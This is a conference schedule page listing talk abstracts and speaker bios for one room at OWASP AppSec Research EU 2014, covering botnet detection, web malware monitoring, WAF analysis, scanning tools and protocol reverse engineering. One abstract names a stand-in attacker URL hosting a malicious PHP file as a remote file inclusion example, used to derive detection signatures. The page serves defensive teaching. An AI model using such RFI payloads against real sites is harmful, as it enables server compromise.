AppSec Europe 2014 has ended
Welcome to the full schedule of the OWASP AppSec Research EU 2014 conference days

Sign up or log in to bookmark your favorites and sync them to your phone or calendar.

LAB003 [clear filter]
Wednesday, June 25

11:00 BST

Cloud-based Detection Techniques for Botnets and Other Malware
Traditional techniques for detecting malware, such as viruses, worms and rootkits, rely on identifying virus-specific signature definitions within network traffic, applications or memory. Because a sample of malware is required to define an attack signature, signature detection has drawbacks when accounting for morphism, has limited use in Zero-Day protection and is a post-infection technique requiring malware to be present on a network, or device, in order to be detected. 

Botnets are ideally suited for launching mass Distributed Denial of Services (DDoS) attacks against the ever increasing number of networked devices that are starting to form the Internet of Things, and ultimately Smart Cities. Regardless of topology; centralised with Command & Control servers (C&C), or distributed peer-to-peer (P2P), Bots must communicate with the other Bots in the Botnet, as well as their overall commanding Botmaster. This communication traffic can be used to detect malware activity in the cloud well before it has been able to evade network perimeter defences, and to determine a route back to source to take down the threat. 

This presentation highlights the main drawbacks of traditional signature based detection methods. It discusses the alternative techniques of cloud based traffic analysis for pre-infection detection of malware, in particular Botnets, which can be performed on Big Data being generated by Service Providers, and demonstrates how cloud centric traffic based detection techniques can be used to complement traditional signature based anti-malware and overcome some of its drawbacks. 

Finally, this presentation identifies a lack of techniques for detecting malicious Bot activity within virtual environments, which now form the backbone of data centre infrastructure, and provide a new, as of yet untapped, attack vector for future malware. This identification of a lack of techniques works as a pre-cursor to my PhD research which is to detect malware behaviour within virtual environments. 


Mark Graham

PhD Student, Anglia Ruskin
Mark has spent 15 years in the IT Industry, wearing various hats, working for Kingston Communication, C&W (formerly Energis), Nortel Networks and Signify. 3 years ago, Mark completed an MSc in Network Security, at Anglia Ruskin University. Mark is currently studying a PhD at Anglia... Read More →

Wednesday June 25, 2014 11:00 - 11:50 BST

11:50 BST

Monitoring Web Sites for Malware Injection with WebDetector
It’s estimated that 86% of all websites had at least a serious vulnerability during 2012. Attackers either manually or automatically (via botnets) deploy C&C servers and malware droppers within exploited websites to infect clients. When such an intrusion is not detected by the owner, the website can deliver malware for long periods until somebody either privately or publicly notices it and maybe an investigation starts. 

To tackle this, we have developed a web monitoring tool called WebDetector, that can be scheduled to run periodically over a list of domain names and to produce a score that indicates how malicious a page is. 

The tool is currently written in python and relies on several open source components for mirroring, file tracking and indexing plus a set of heuristics to detect harmful components like javascripts, PDF, shockwaves, form spoofing and link redirection. The framework can be expanded with modular signatures to detect in future more types of attacks with the help of the community. 

We have tested the efficacy of WebDetector by deliberately adding common malicious behaviour in a controlled Wordpress installation. More sophisticated malware strategies needs refined heuristics for detection that will be addressed in future. 

avatar for Paolo Di Prodi

Paolo Di Prodi

Machine Learning Engineer, Microsoft
I love control systems and robotics.

Wednesday June 25, 2014 11:50 - 12:35 BST

13:50 BST

Defending TCP Against DoS Attacks
On the global Internet, the main function of TCP is to provide a reliable byte stream process to process communication. Today, TCP is the most widespread protocol used for exchanging data in the Internet and almost responsible for more than 90 percent of the world's total data traffic on the Internet. Despite its widespread usage, many of the TCP protocols were designed with little consideration given to the security implications. For example, the TCP protocol stack could be vulnerable to a variety of attacks ranging from IP spoofing to denial of service.

This paper classifies a range of known TCP attack methods focusing in particular on password sniffing, SYN flooding, IP spoofing, TCP sequence number attack, TCP session hijacking, RST/FIN attacks and the low rate TCP targeted denial of service attack. . The paper will also examine the vulnerability points of these TCP protocols in attempting to provide solutions to such attacks. Finally, a real time network simulation infrastructure will be provided along with detail experiments analysis to validate the efficiency of our security approaches. 


Hesham El Zouka

Arab Academy for Science & Technology and Maritime Transport

Wednesday June 25, 2014 13:50 - 14:40 BST

14:40 BST

OWASP ZAP: Advanced Features
The Zed Attack Proxy (ZAP) is an OWASP Flagship project and the largest open source web application security tool measured by active contributors. While it is an ideal tool for people new to appsec it also has many features specifically intended for advanced penetration testing. 

In this talk Simon will give a quick introduction to ZAP and then dive into some of these features, including: 
* Handling single page and other ‘non standard’ apps 
* Client side testing with Plug-n-Hack 
* Advanced scanning options 
* Contexts 
* Fuzzing 
* Scripting 
* Zest - ZAP’s macro language 
* Changing the source code 

avatar for Simon Bennetts

Simon Bennetts

ZAP Project Lead, Jit
Simon Bennetts is the OWASP Zed Attack Proxy (ZAP) Founder and Project Leader, and a Distinguished Engineer at Jit.He has talked about and demonstrated ZAP at conferences all over the world, including Blackhat, JavaOne, FOSDEM and OWASP AppSec EU, USA & AsiaPac.Prior to making the... Read More →

Wednesday June 25, 2014 14:40 - 15:30 BST

15:55 BST

Getting New Actionable Insights by Analyzing Web Application Firewall Triggers
ModSecurity Web Application Firewall was first released more than a decade ago, available as open source software that gives the ability to protect web applications. Over the years ModSecurity has matured significantly, and is the most widely deployed WAF, protecting millions of websites. A long side ModSecurity engine we can also find OWASP ModSecurity Core Rule Set (CRS), which is a library of generic application security signatures that provide a base level of protection for any web application.

In this presentation I will show an advanced technique for post processing of ModSecurity Core Rule Set WAF triggers in order to generate actionable defenses that are derived from WAF triggers. The objective of the post processing is to improve security controls. Based on the collected malicious HTTP traffic we can produce new insights on our attackers and the techniques they use and as a result we can harden defenses that will improve our mitigations.

The presentation will include detailed description of several techniques with case studies based on real traffic from Akamai's security big data platform (Cloud Security Intelligence).

Example for analysis on remote file inclusion attack:

When analyzing the payload of a remote file inclusion attack we will find a link to a remote source code file the attackers are trying to inject into the vulnerable application.
The injected remote source file is in many cases a static "anchor" in a continues attack campaign that uses various RFI vulnerabilities with the same remote file.

Generating signature that matches attacks based on the attack "anchor" can improve the detection capabilities for ModSecurity CRS and at the same time give better insight on the threat landscape.
More than that, this "anchor" can be used as enrichment for other security controls that monitor URL and domain reputation.

RFI attack:


In the attack above we can see remote source file located on “www.attacker.com/malicous.php”, using this malicious file can be valuable when:

  • Looking for the same link on HTTP traffic (complementary to ModSecurity CRS rules)

  • Blocking traffic from within the organization to the attacker web application

  • Correlating similar attacks as same distributed attack campaign 

avatar for Or Katz

Or Katz

Researcher, Akamai technologies
Or Katz is a security veteran, with years of experience at industry leading vendors, currently serves as principal lead security researcher for Akamai. Katz is a frequent Speaker in security conferences and published numerous articles, blogs and white papers on threat intelligence... Read More →

Wednesday June 25, 2014 15:55 - 16:45 BST

16:45 BST

Use of Netflow/IPFix Botnet Detection Tools to Determine Placement for Autonomous VM’s
This paper describes a novel method of autonomously detecting malicious Botnet behaviour within a Cloud datacentre, while at the same time managing Virtual Machine (VM) placement in accordance to its findings, and it presents its implementation with the Scala programming language. A key feature of this method, using output from Netflow/IPFix, both of which are capable of producing detailed network traffic logs, is its capability of detecting unusual Client behaviour through the analysis of individual data packet information.

It has been implemented as a module of an Autonomous Management Distributed System (AMDS) presented in [Dinita, R. I., Wilson, G., Winckles, A., Cirstea, M., Rowsell, T. (2013)], giving it direct access to all the VMs and Hypervisors on the Cloud network. As such, another key feature is that it can have an immediate and effective impact on network security in a Botnet attack context by issuing lockout commands to every networked VM through the AMDS. A proof of concept has been developed and is currently running successfully on the authors’ test bed. 


Razvan-Ioan Dinita

PhD research student and Lecturer, Anglia Ruskin University
Razvan-Ioan Dinita has received a degree in Computer Science and Internet Technology from Anglia Ruskin University of Cambridge, UK. He is currently a PhD research student in Cloud Computing and a Lecturer in Computer Science and Cloud Computing at Anglia Ruskin University. His research... Read More →

Wednesday June 25, 2014 16:45 - 17:35 BST
Thursday, June 26

10:25 BST

Hybrid Analysis Mapping: Making Security and Development Tools Play Nice Together
Developers want to write code and security testers want to break it and both groups have specialized tools supporting these goals. The problem is – security testers need to know more about application code to do better testing and developers need to be able to quickly address problems found by security testers. This presentation looks at both groups and their respective toolsets and explores ways they can help each other out. 

Two different interactions are examined: 
• How can knowledge of code make application scanning better? 
• How can application scan results be mapped back to specific lines of code? 

Using open source examples built on OWASP ZAP, ThreadFix and Eclipse, the presentation walks through the process of seeding web applications scans with knowledge gleaned from code analysis as well as the mapping of dynamic scan results to specific line of code. The end result is a combination of testing and remediation workflows that help both security testers and software developers be more effective. Particular attention is give to Java/JSP applications and Java/Spring applications and how teams using these frameworks can best benefit from these interactions.

avatar for Dan Cornell

Dan Cornell

Vice President, Product Strategy, COALFIRE
A globally recognized software security expert, Dan Cornell has over 20 years of experience architecting, developing and securing software systems. As Vice President of Product Strategy at Coalfire, Dan works with customers and industry partners to help drive the direction of their... Read More →

Thursday June 26, 2014 10:25 - 11:15 BST

11:15 BST

Continuous Security Testing in a Devops World
Three key devops principles are the merging of skills in previously separate teams, extensive process automation and faster delivery through more frequent software deploys.

These present some interesting challenges to application security such as:

  • How to effectively communicate and manage security requirements in such a dynamic environment?

  • How to perform rigorous security testing when software is deployed multiple times per day?

  • How to integrate security processes into the existing continuous integration/deployment environments?

In this talk I will explore these questions and present an open source security testing framework that aims to address them through the use of Behaviour Driven Development (BDD).

A key concept from agile software development is that the software tests are the documentation. While this approach works well when all the stakeholders are developers, it can break down when neither the ops nor the security team are proficient in a programming language.

BDD offers a communication bridge between security, development and testing so that security requirements can be defined in a natural language; and yet still be executable as automated software tests.

The BDD-Security framework was created in order to provide a set of pre- defined security requirements that can be executed against most web applications with minimal changes. It uses Selenium and OWASP ZAP in order to mimic the testing that a human security tester would perform including authentication and access control tests that were previously difficult to automate and beyond the capabilities of scanners. Since the framework is based on JBehave, which provides JUnit wrappers, it fits into existing automated deployment and continuous integration pipelines.

The talk will demonstrate how to configure the BDD-Security framework and how to integrate it with the Jenkins CI server in order to provide continuous and in-depth security testing that includes both functional and non-functional testing.

The result is an automated process from code commit, to build, deploy and security testing where the results of the tests are understandable by all stakeholders. 

avatar for Stephen de Vries

Stephen de Vries

Founder, CEO, Continuum Security SL
Stephen is the founder of Continuum Security and focussed on building AppSec tools to support security in the SDLC, including the IriusRisk threat modeling tool and BDD-Security open source security testing framework. His background is in software development and security testing... Read More →

Thursday June 26, 2014 11:15 - 12:05 BST

12:05 BST

ActiveScan++: Augmenting manual testing with attack proxy plugins
This presentation will introduce ActiveScan++ and demonstrate how it can be used to easily identify complex vulnerabilities in real world applications. ActiveScan++ is an open source Python plugin that builds upon Burp Suite's basic active scanning functionality. This talk will cover the classic and exotic vulnerabilities it can detect, as well as the pros and pitfalls that can be found with the proxy-plugin approach to automated vulnerability hunting.

ActiveScan++ uses heuristic probes to efficiently assess the susceptibility of the target to a range of cutting edge attack techniques, such as host header poisoning and relative path overwrites. In addition, ActiveScan++ provides robust identification of blind attack issues, helping to locate rare but critical vulnerabilities such as code injection that pentesters can't afford to miss. Demonstrations of the underlying mechanics of these attacks, how they can be automatically detected, and how we can actively exploit them once they have been identified will be performed throughout the presentation.

The presentation will finish with a discussion of current research into automated detection of 'suspicious' behaviour, in a manner similar to the initial stages of manual testing. These new techniques allow generic detection of entire vulnerability classes by combining platform-independent payload sets with fuzzy pattern matching.

This presentation will host the first public release of this open source tool.


James Kettle

Context Information Security
James Kettle has  extensive experience vulnerability bounty hunting across Mozilla's and Google's heavily secured infrastructure, resulting in being ranked 6th in Google's 0x0A list for 2012/13. As part of this he has  performed security research culminating in novel attack techniques... Read More →

Thursday June 26, 2014 12:05 - 12:50 BST

13:50 BST

Barbican: Protect your Secrets at Scale
For sys admins, your servers hold many pieces of sensitive information, whether they are iron, virtual or cloud boxes. These keys to your kingdom need protection but must also also allow for infrastructure at scale. Application Security current best practices talk about key management, key rotation but have little to no practical advice beyond policy and general statements.

This presentation discusses a proposed solution for key management, named Barbican, an open source project that is part of OpenStack. Its goal was to build a secure, Cloud-ready key management solution. Barbican can be used by OpenStack implementors or anyone willing to run a server or two. This talk will walk through the current state of Barbican, its technical architecture, how to use it as an internal or cloud service and demonstrate our current proof of concept implementation.

avatar for Matt Tesauro

Matt Tesauro

Senior AppSec Engineer, Duo Security
Matt Tesauro is currently a Senior AppSec Engineer building an AppSec Pipeline and continuous security program for Duo Security.  Prior, he worked full-time for the OWASP Foundation, adding automation and awesome to OWASP projects as the Operations Director. Previously, he was... Read More →

Thursday June 26, 2014 13:50 - 14:40 BST

16:00 BST

Shameful Secrets of Proprietary Network Protocols
There is a big bunch of tools offering HTTP/SSL traffic interception. However, when it comes to penetration tests of specialized embedded software or thick clients, we often encounter proprietary protocols with no documentation at all. Binary TCP connections, unlike anything, impossible to be adapted by a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. Though, based on our experience, it very often hides a shameful mystery - completely unsecured mechanisms breaking all good coding practices.

We would like to present our approach and a short guideline how to reverse engineer proprietary protocols - a world full of own implementations of asymmetric cryptography, revertible hash algorithms, lack of user authentication and no function or data access control at all.

To demonstrate, we will show 5 case-studies - most interesting examples from real-life financial industry software, which in our opinion are aquintessence of "security by obscurity". We will talk about homeautomation, embedded pull printing software in multifunction printers (MFP), remote desktop protocols and twisted vulnerabilities in FOREX trading software, which is particularly risky business regarding security.


Slawomir Jasek

IT security consultant with over 10 years of experience. Participated in many assessments of systems' and applications' security, for leading financial companies and public institutions, including a few dozen e-banking systems. Currently focuses on consulting design of secure solutions... Read More →
avatar for Jakub Kaluzny

Jakub Kaluzny

Sr. IT Security Consultant, SecuRing
Jakub is a Senior IT Security Consultant at SecuRing and performs penetration tests of high-risk applications, systems and devices. He was a speaker at many internetional conferences: BlackHat Asia, OWASP AppSec EU, PHdays, HackInTheBox, ZeroNights as well at local security events... Read More →

Thursday June 26, 2014 16:00 - 16:50 BST
Filter sessions
Apply filters to sessions.